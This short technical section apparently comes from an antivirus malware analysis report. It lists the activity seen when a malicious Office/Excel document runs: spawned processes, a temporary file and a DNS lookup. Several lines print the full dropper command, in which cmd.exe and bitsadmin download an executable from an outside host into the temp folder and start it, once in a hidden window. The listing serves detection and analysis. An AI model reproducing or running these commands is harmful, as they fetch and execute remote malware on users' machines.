Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer lzizszcwy /download /priority high https://dandyla.gq/eshi.exe %temp%\ypjmyr.exe&start %temp%\ypjmyr.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{2d4336ab-4f3b-4d48-9688-4330fb4d656f}.tmp
- DNS ASK da##yla.gq
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\bitsadmin.exe' /transfer lzizszcwy /download /priority high https://dandyla.gq/eshi.exe %TEMP%\ypjmyr.exe
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer lzizszcwy /download /priority high https://dandyla.gq/eshi.exe %temp%\ypjmyr.exe&start %temp%\ypjmyr.exe (со скрытым окном)